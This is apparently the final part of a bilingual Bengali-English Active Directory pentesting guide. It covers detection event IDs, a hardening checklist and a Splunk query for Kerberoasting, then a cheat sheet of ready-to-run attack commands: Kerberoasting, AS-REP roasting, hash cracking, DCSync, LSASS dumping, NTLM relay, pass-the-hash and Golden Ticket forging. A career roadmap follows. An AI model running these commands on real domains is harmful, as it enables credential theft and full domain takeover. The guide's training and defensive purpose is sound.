4720User account createdUser account createdBackdoor account
4732Member added to security groupMember added to security groupPrivilege Escalation
4768Kerberos TGT requestedAS-REP Roasting
4769Kerberos Service Ticket requestedKerberoasting
4771Kerberos pre-auth failedPassword spray
4776NTLM authenticationPass-the-Hash
4662AD object accessed (DCSync!)DCSync

AD Hardening Checklist

অবশ্যই করোMust Do

  • KRBTGT password নিয়মিত reset করো (দুইবার)Reset regularly (twice)
  • SMB Signing enable করো
  • LLMNR/NBT-NS disable করো (NTLM Relay রোধPrevent NTLM Relay)
  • Protected Users group ব্যবহার করোUse Protected Users group
  • LAPS (Local Admin Password Solution)
  • Tiered Administration Model
  • Privileged Access Workstation (PAW)
  • Windows Defender Credential Guard
  • Audit logging (Event ID 4662, 4769)
  • Microsoft ATA / Defender for Identity

যা করবে নাNever Do

  • Domain Admin account দিয়ে daily কাজaccount for daily work
  • Service account-এ weak password
  • SPN অপ্রয়োজনীয় set করাsetting unnecessary SPNs
  • Unconstrained Delegation ব্যবহারuse
  • WDigest authentication enable
  • SMB v1 enable রাখা
  • DA account-এ email/browsing
  • Print Spooler on DC
  • Domain Admin-এ local login

Kerberoasting Detection

# Event ID 4769 — Kerberos Service Ticket Request # Normal: Encryption Type 0x12 (AES256) # Suspicious: Encryption Type 0x17 (RC4-HMAC) — Kerberoast! # Splunk Query: index=windows EventCode=4769 Ticket_Encryption_Type=0x17 | stats count by Account_Name, Service_Name | where count > 5 # Service account hardening: # AES encryption-only enforce করো: Set-ADUser svc_sql -KerberosEncryptionType AES256 # Managed Service Account (MSA) বা Group MSA ব্যবহার করো: New-ADServiceAccount -Name "svc_app" -ManagedPasswordIntervalInDays 30 # → Password auto-rotate হয়, crack করা অনেক কঠিন!

🛡️ Defense মনে রাখোRemember

  • ✅ Event 4769 + RC4 → Kerberoast | Event 4662 → DCSync
  • ✅ LLMNR/NBT-NS off → NTLM Relay বন্ধ
  • ✅ Tiered Model → DA account শুধু DC-তে ব্যবহারDA account used only on DC
  • ✅ Managed Service Account → Auto password, Kerberoast কঠিনAuto password, Kerberoast is hard
CHAPTER 10
📋 Cheat Sheet & Roadmap
সব গুরুত্বপূর্ণ কমান্ড ও AD Pentester হওয়ার পথAll important commands and the path to becoming an AD Pentester

⚡ Quick Attack Commands

🔍 Enumeration
bloodhound-python -d corp.local -u user -p pass -c AllBloodHound collect
Get-NetUser -SPNKerberoast targets
Get-NetUser -PreauthNotRequiredAS-REP targets
Find-InterestingDomainAcl -ResolveGUIDsACL abuse
crackmapexec smb 192.168.56.0/24 -u user -p passNetwork sweep
🎫 Kerberos
GetNPUsers.py corp.local/ -usersfile users.txt -no-passAS-REP Roast
GetUserSPNs.py corp.local/user:pass -requestKerberoast
hashcat -m 18200 asrep.txt rockyou.txtAS-REP crack
hashcat -m 13100 kerb.txt rockyou.txtTGS crack
.\Rubeus.exe kerberoast /outfile:k.txtRubeus Kerberoast
🔑 Credentials
secretsdump.py corp/Admin:Pass@dc01DCSync
secretsdump.py corp/Admin@dc01 -hashes :HASHDCSync PTH
pypykatz lsa minidump lsass.dmpLSASS parse
crackmapexec smb -u Admin -H HASH --ntdsNTDS dump
ntlmrelayx.py -tf targets.txt -smb2supportNTLM Relay
🌐 Lateral Movement
psexec.py corp/Admin@192.168.56.11 -hashes :HASHPSExec PTH
wmiexec.py corp/Admin@192.168.56.11 -hashes :HASHWMIExec
evil-winrm -i IP -u Admin -H HASHWinRM PTH
crackmapexec smb IP -u Admin -H HASH -x "whoami"CME execute
Invoke-Command -ComputerName WS01 -ScriptBlock {whoami}PS Remoting

👑 Domain Compromise Commands

# ═══ AS-REP Roast ═══ GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 192.168.56.10 hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt # ═══ Kerberoast ═══ GetUserSPNs.py corp.local/john:Password123 -dc-ip 192.168.56.10 -request -outputfile kerb.txt hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt # ═══ Pass-the-Hash ═══ crackmapexec smb 192.168.56.0/24 -u Administrator -H NTLM_HASH --continue-on-success evil-winrm -i 192.168.56.10 -u Administrator -H NTLM_HASH # ═══ DCSync ═══ secretsdump.py corp.local/Administrator:Admin123@192.168.56.10 -just-dc-ntlm # ═══ Golden Ticket ═══ # 1. KRBTGT hash পাও (DCSync থেকে) # 2. Domain SID: lookupsid.py corp.local/john:Pass123@dc01.corp.local 0 # 3. Golden Ticket তৈরি: ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local -duration 3650 godmode export KRB5CCNAME=godmode.ccache secretsdump.py -k -no-pass corp.local/godmode@dc01.corp.local

🗺️ AD Pentester Roadmap

1
🪟 Phase 1 — Windows ভিত্তিPhase 1 — Windows Foundation 1-2 মাস
Windows OS internals, Active Directory concept, PowerShell না জানলে AD attack বোঝা কঠিন।Without knowing Windows OS internals, Active Directory concepts, and PowerShell, AD attacks are hard to understand.
Windows Internals PowerShell basics AD Architecture Kerberos protocol SMB, NTLM basics
2
🔧 Phase 2 — Lab তৈরিPhase 2 — Build a Lab 1 সপ্তাহ
Vulnerable-AD দিয়ে নিজের lab তৈরি করো — হাতে-কলমে করা ছাড়া শেখা হবে না।Build your own lab with Vulnerable-AD — you can't learn without hands-on practice.
Windows Server VM Vulnerable-AD script Kali + impacket BloodHound setup
3
⚔️ Phase 3 — Core AttacksPhase 3 — Core Attacks 2-3 মাস
Kerberoast, PTH, BloodHound — এগুলো ছাড়া AD pentest অসম্পূর্ণ।Without Kerberoast, PTH, and BloodHound, AD pentest is incomplete.
AS-REP Roasting Kerberoasting Pass-the-Hash BloodHound paths NTLM Relay
4
👑 Phase 4 — Advanced & Domain CompromisePhase 4 — Advanced & Domain Compromise 2-3 মাস
ACL abuse, DCSync, Golden Ticket, CVE exploitation — পুরো domain control।ACL abuse, DCSync, Golden Ticket, CVE exploitation — full domain control.
ACL abuse DCSync Golden Ticket Delegation attacks GOAD lab
5
🏆 Phase 5 — Certification & CareerPhase 5 — Certification & Career চলমানOngoing
CRTP → CRTE → CRTO → OSCP — AD-focused certification পথ।CRTP → CRTE → CRTO → OSCP — AD-focused certification path.
CRTP (Altered Security) CRTE CRTO (Zero-Point) OSCP HackTheBox Pro Labs

📚 সেরা ResourcesBest Resources

ResourceধরনTypeবিষয়Topic
HackTheBox Pro Labs: RastaLabsLabReal AD environment practiceReal AD environment practice
GOAD (Game of AD)LabVulnerable AD home labVulnerable AD home lab
TryHackMe — Holo / ThrowbackLabAD-focused learning paths
CRTP Course (Nikhil Mittal)CourseAD attack lab + cert
ired.teamNotesBest free AD attack notesBest free AD attack notes
S1ren / TCM SecurityYouTubeFree AD course
BloodHound DocsDocsBloodHound usage
impacket GitHubToolAll AD Python tools

🏰 "In Active Directory, every misconfiguration is a path to Domain Admin."

এই ডকুমেন্ট সম্পূর্ণ শিক্ষামূলক উদ্দেশ্যে। সব সময় authorized lab বা pentest environment-এ practice করো। This document is entirely for educational purposes. Always practice in an authorized lab or pentest environment.

v1.0 — Active Directory Attack | Bilingual | Dark/Light Mode